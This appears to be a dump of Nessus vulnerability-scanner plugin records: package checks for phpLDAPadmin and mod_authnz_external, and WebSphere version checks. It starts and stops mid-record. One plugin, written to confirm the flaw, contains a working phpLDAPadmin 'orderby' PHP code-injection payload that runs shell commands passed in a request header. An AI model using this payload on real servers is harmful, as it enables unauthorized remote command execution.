["p-cpe:/a:fedoraproject:fedora:phpldapadmin", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2011-14993.NASL", "href": "https://www.tenable.com/plugins/nessus/56936", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-14993.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56936);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_xref(name:\"FEDORA\", value:\"2011-14993\");\n\n script_name(english:\"Fedora 15 : phpldapadmin-1.2.1.1-2.20111006git.fc15 (2011-14993)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to the latest upstream development code to fix CVE-2011-4074\nand CVE-2011-4075 (XSS and code injection vulnerabilities in versions\n<= 1.2.1.1)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=748537\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-November/069777.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ddff2581\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpldapadmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"phpLDAPadmin 1.2.1.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpLDAPadmin query_engine Remote PHP Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpldapadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"phpldapadmin-1.2.1.1-2.20111006git.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpldapadmin\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:37:21", "description": "The version of phpLDAPadmin installed on the remote host does not sanitize input to the 'orderby' parameter of the 'cmd.php' script when 'cmd' is set to 'query_engine' before using it in a call to 'create_function()'.\n\nAn unauthenticated, remote attacker can leverage this issue to execute arbitrary PHP code on the affected host, subject to the privileges under which the web server runs.", "cvss3": {"score": null, "vector": null}, "published": "2011-11-03T00:00:00", "type": "nessus", "title": "phpLDAPadmin orderby Parameter Arbitrary PHP Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4075"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:deon_george:phpldapadmin"], "id": "PHPLDAPADMIN_ORDERBY_CMD_EXEC.NASL", "href": "https://www.tenable.com/plugins/nessus/56703", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56703);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2011-4075\");\n script_bugtraq_id(50331);\n script_xref(name:\"EDB-ID\", value:\"18021\");\n script_xref(name:\"EDB-ID\", value:\"18031\");\n\n script_name(english:\"phpLDAPadmin orderby Parameter Arbitrary PHP Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP application that can be abused to\nexecute arbitrary PHP code.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of phpLDAPadmin installed on the remote host does not\nsanitize input to the 'orderby' parameter of the 'cmd.php' script when\n'cmd' is set to 'query_engine' before using it in a call to\n'create_function()'.\n\nAn unauthenticated, remote attacker can leverage this issue to execute\narbitrary PHP code on the affected host, subject to the privileges\nunder which the web server runs.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://sourceforge.net/support/tracker.php?aid=3417184\");\n # http://phpldapadmin.git.sourceforge.net/git/gitweb.cgi?p=phpldapadmin/phpldapadmin\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4d5eab60\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the patch to 'lib/functions.php' in the project's GIT\nrepository.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"phpLDAPadmin 1.2.1.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpLDAPadmin query_engine Remote PHP Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:deon_george:phpldapadmin\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"phpldapadmin_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/PHP\", \"www/phpLDAPadmin\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80, php:TRUE, embedded:FALSE);\n\n\ninstall = get_install_from_kb(appname:\"phpLDAPadmin\", port:port, exit_on_fail:TRUE);\ndir = install['dir'];\n\n\n# Try to exploit the issue to run a command.\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig /all';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig /all');\n\ncmd_pats = make_array();\ncmd_pats['id'] = \"uid=[0-9]+.*gid=[0-9]+.*\";\ncmd_pats['ipconfig'] = \"Subnet Mask\";\n\nsemaphore = '_' + SCRIPT_NAME - '.nasl' + '_';\n\n# We need a cookie for the exploits to work.\ninit_cookiejar();\n\nurl = dir + '/';\nres = http_send_recv3(port:port, method:\"GET\", item:url, exit_on_fail:TRUE);\n\nforeach cmd (cmds)\n{\n payload = 'nessus));}}' +\n 'error_reporting(0);' +\n 'print(' + semaphore + ');' +\n 'passthru(base64_decode($_SERVER[HTTP_CMD]));' +\n 'die;/*';\n\n url = dir + '/cmd.php?' +\n 'cmd=query_engine&' +\n 'query=none&' +\n 'search=1&' +\n 'orderby=' + urlencode(str:payload, unreserved:\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_!~*'()-]/=;<>$[]\");\n\n res = http_send_recv3(\n port : port,\n method : \"GET\",\n item : url,\n add_headers : make_array(\"Cmd\", base64(str:cmd)),\n exit_on_fail : TRUE\n );\n\n if (\n semaphore >< res[2] &&\n egrep(pattern:cmd_pats[cmd], string:res[2])\n )\n {\n if (report_verbosity > 0)\n {\n output = strstr(res[2], semaphore) - semaphore;\n if (!egrep(pattern:cmd_pats[cmd], string:output)) output = \"\";\n\n report =\n '\\nNessus was able to verify the issue exists using the following request :' +\n '\\n' +\n '\\n' + crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) +\n '\\n' + http_last_sent_request() +\n '\\n' + crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n';\n\n if (report_verbosity > 1)\n {\n report +=\n '\\n' + 'This produced the following output :' +\n '\\n' +\n '\\n' + crap(data:\"-\", length:30) + \" snip \" + crap(data:\"-\", length:30) +\n '\\n' + data_protection::sanitize_uid(output:chomp(output)) +\n '\\n' + crap(data:\"-\", length:30) + \" snip \" + crap(data:\"-\", length:30) + '\\n';\n }\n\n report +=\n '\\n' + 'Note that the Cookie header in the request above uses a value' +\n '\\n' + 'returned after visiting the application\\'s initial page. The value' +\n '\\n' + 'reported above may have expired and need to be updated in order to' +\n '\\n' + 'validate the finding.';\n\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n }\n}\nexit(0, \"The phpLDAPadmin install at \"+build_url(port:port, qs:dir+'/')+\" is not affected.\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:59:41", "description": "The remote host is affected by the vulnerability described in GLSA-201110-23 (Apache mod_authnz_external: SQL injection)\n\n mysql/mysql-auth.pl in mod_authnz_external does not properly sanitize input before using it in a SQL query.\n Impact :\n\n A remote attacker could exploit this vulnerability to inject arbitrary SQL statements by using a specially crafted username for HTTP authentication on a site using mod_authnz_external.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": null, "vector": null}, "published": "2011-10-26T00:00:00", "type": "nessus", "title": "GLSA-201110-23 : Apache mod_authnz_external: SQL injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2688"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:mod_authnz_external", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201110-23.NASL", "href": "https://www.tenable.com/plugins/nessus/56635", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201110-23.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56635);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-2688\");\n script_bugtraq_id(48653);\n script_xref(name:\"GLSA\", value:\"201110-23\");\n\n script_name(english:\"GLSA-201110-23 : Apache mod_authnz_external: SQL injection\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201110-23\n(Apache mod_authnz_external: SQL injection)\n\n mysql/mysql-auth.pl in mod_authnz_external does not properly sanitize\n input before using it in a SQL query.\n \nImpact :\n\n A remote attacker could exploit this vulnerability to inject arbitrary\n SQL statements by using a specially crafted username for HTTP\n authentication on a site using mod_authnz_external.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201110-23\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Apache mod_authnz_external users should upgrade to the latest\n version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-apache/mod_authnz_external-3.2.6'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mod_authnz_external\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-apache/mod_authnz_external\", unaffected:make_list(\"ge 3.2.6\"), vulnerable:make_list(\"lt 3.2.6\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Apache mod_authnz_external\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T13:00:09", "description": "It was discovered that libapache2-mod-authnz-external, an apache authentication module, is prone to a SQL injection via the $user parameter.", "cvss3": {"score": null, "vector": null}, "published": "2011-07-20T00:00:00", "type": "nessus", "title": "Debian DSA-2279-1 : libapache2-mod-authnz-external - SQL injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2688"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libapache2-mod-authnz-external", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DSA-2279.NASL", "href": "https://www.tenable.com/plugins/nessus/55624", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2279. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55624);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2011-2688\");\n script_bugtraq_id(48653);\n script_xref(name:\"DSA\", value:\"2279\");\n\n script_name(english:\"Debian DSA-2279-1 : libapache2-mod-authnz-external - SQL injection\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that libapache2-mod-authnz-external, an apache\nauthentication module, is prone to a SQL injection via the $user\nparameter.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=633637\"\n );\n # https://packages.debian.org/source/squeeze/libapache2-mod-authnz-external\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dce35710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2279\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libapache2-mod-authnz-external packages.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 3.2.4-2+squeeze1.\n\nThe oldstable distribution (lenny) does not contain\nlibapache2-mod-authnz-external.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libapache2-mod-authnz-external\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libapache2-mod-authnz-external\", reference:\"3.2.4-2+squeeze1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:59:47", "description": "IBM WebSphere Application Server 7.0 before Fix Pack 19 appears to be running on the remote host. As such, it is potentially affected by the following vulnerabilities :\n\n - An open redirect vulnerability exists related to the 'logoutExitPage' parameter. This can allow remote attackers to trick users into requesting unintended URLs. (PM35701)\n\n - The administrative console can display a stack trace under unspecified circumstances and can disclose potentially sensitive information to local users.\n (PM36620)\n\n - The Installation Verification Tool servlet (IVT) does not properly sanitize user-supplied input of arbitrary HTML and script code, which could allow cross-site scripting attacks. (PM40733)\n\n - A token verification error exists in the bundled OpenSAML library. This error can allow an attacker to bypass security controls with an XML signature wrapping attack via SOAP messages. (PM43254)\n\n - A directory traversal attack is possible via unspecified parameters in the 'help' servlet. (PM45322)", "cvss3": {"score": null, "vector": null}, "published": "2011-09-19T00:00:00", "type": "nessus", "title": "IBM WebSphere Application Server 7.0 < Fix Pack 19 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1355", "CVE-2011-1356", "CVE-2011-1359", "CVE-2011-1362", "CVE-2011-1411"], "modified": "2018-08-06T00:00:00", "cpe": ["cpe:/a:ibm:websphere_application_server"], "id": "WEBSPHERE_7_0_0_19.NASL", "href": "https://www.tenable.com/plugins/nessus/56229", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(56229);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n script_cve_id(\n \"CVE-2011-1355\",\n \"CVE-2011-1356\",\n \"CVE-2011-1359\",\n \"CVE-2011-1362\",\n \"CVE-2011-1411\"\n );\n script_bugtraq_id(48709, 48710, 48890, 49362);\n\n script_name(english:\"IBM WebSphere Application Server 7.0 < Fix Pack 19 Multiple Vulnerabilities\");\n script_summary(english:\"Reads the version number from the SOAP port\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote application server may be affected by multiple vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"IBM WebSphere Application Server 7.0 before Fix Pack 19 appears to be\nrunning on the remote host. As such, it is potentially affected by\nthe following vulnerabilities :\n\n - An open redirect vulnerability exists related to the\n 'logoutExitPage' parameter. This can allow remote\n attackers to trick users into requesting unintended\n URLs. (PM35701)\n\n - The administrative console can display a stack trace\n under unspecified circumstances and can disclose\n potentially sensitive information to local users.\n (PM36620)\n\n - The Installation Verification Tool servlet (IVT) does\n not properly sanitize user-supplied input of arbitrary\n HTML and script code, which could allow cross-site\n scripting attacks. (PM40733)\n\n - A token verification error exists in the bundled\n OpenSAML library. This error can allow an attacker to\n bypass security controls with an XML signature wrapping\n attack via SOAP messages. (PM43254)\n\n - A directory traversal attack is possible via unspecified\n parameters in the 'help' servlet. (PM45322)\"\n );\n script_set_attribute(attribute:\"see_also\",value:\"http://www-01.ibm.com/support/docview.wss?uid=swg21404665\");\n script_set_attribute(attribute:\"see_also\",value:\"http://www-01.ibm.com/support/docview.wss?uid=swg27009778\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?rs=180&uid=swg27014463#70019\");\n # PM35701 and PM36620\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg1PM46122\");\n # PM43254\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg1PM46125\");\n # PM45322\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg1PM46125\");\n script_set_attribute(attribute:\"solution\", value:\n\"If using WebSphere Application Server, apply Fix Pack 19 (7.0.0.19) or\nlater. \n\nOtherwise, if using embedded WebSphere Application Server packaged with\nTivoli Directory Server, apply the latest recommended eWAS fix pack.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/07/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/09/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:websphere_application_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"websphere_detect.nasl\");\n script_require_ports(\"Services/www\", 8880, 8881);\n script_require_keys(\"www/WebSphere\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8880, embedded:0);\n\n\nversion = get_kb_item(\"www/WebSphere/\"+port+\"/version\");\nif (isnull(version)) exit(1, \"Failed to extract the version from the IBM WebSphere Application Server instance listening on port \" + port + \".\");\nif (version =~ \"^[0-9]+(\\.[0-9]+)?$\")\n exit(1, \"Failed to extract a granular version from the IBM WebSphere Application Server instance listening on port \" + port + \".\");\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif (ver[0] == 7 && ver[1] == 0 && ver[2] == 0 && ver[3] < 19)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n source = get_kb_item_or_exit(\"www/WebSphere/\"+port+\"/source\");\n\n report =\n '\\n Source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 7.0.0.19' +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse exit(0, \"The WebSphere Application Server \"+version+\" instance listening on port \"+port+\" is not affected.\");\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2022-07-10T16:11:13", "description": "IBM WebSphere Application Server 8.0 before Fix Pack 1 appears to be running on the remote host and is potentially affected by the following vulnerabilities :\n\n - An open redirect vulnerability exists related to the 'logoutExitPage' parameter. This can allow remote attackers to trick users into requesting unintended URLs. (PM35701)\n\n - The administrative console can display a stack trace under unspecified circumstances and can disclose potentially sensitive information to local users.\n (PM36620)\n\n - An unspecified error exists that can allow cross-site request forgery attacks. (PM36734)\n\n - A token verification error exists in the bundled OpenSAML library. This error can allow an attacker to bypass security controls with an XML signature wrapping attack via SOAP messages. (PM43254)\n\n - A directory traversal attack is possible via unspecified parameters in the 'help' servlet. (PM45322)\n\n - The JavaServer Faces (JSF) application functionality could allow a remote attacker to read files because it fails to properly handle requests. (PM45992)\n\n - The HTTP server contains an error in the 'ByteRange' filter and can allow denial of service attacks when processing malicious requests. (PM46234)", "cvss3": {"score": null, "vector": null}, "published": "2011-09-30T00:00:00", "type": "nessus", "title": "IBM WebSphere Application Server 8.0 < Fix Pack 1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1355", "CVE-2011-1356", "CVE-2011-1359", "CVE-2011-1368", "CVE-2011-1411", "CVE-2011-3192"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:ibm:websphere_application_server"], "id": "WEBSPHERE_8_0_0_1.NASL", "href": "https://www.tenable.com/plugins/nessus/56348", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(56348);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_cve_id(\n \"CVE-2011-1355\",\n \"CVE-2011-1356\",\n \"CVE-2011-1359\",\n \"CVE-2011-1368\",\n \"CVE-2011-1411\",\n \"CVE-2011-3192\"\n );\n script_bugtraq_id(48709, 48710, 48890, 49303, 49362, 49766, 50463);\n\n script_name(english:\"IBM WebSphere Application Server 8.0 < Fix Pack 1 Multiple Vulnerabilities\");\n script_summary(english:\"Reads the version number from the SOAP port\");\n\n script_set_attribute(\n 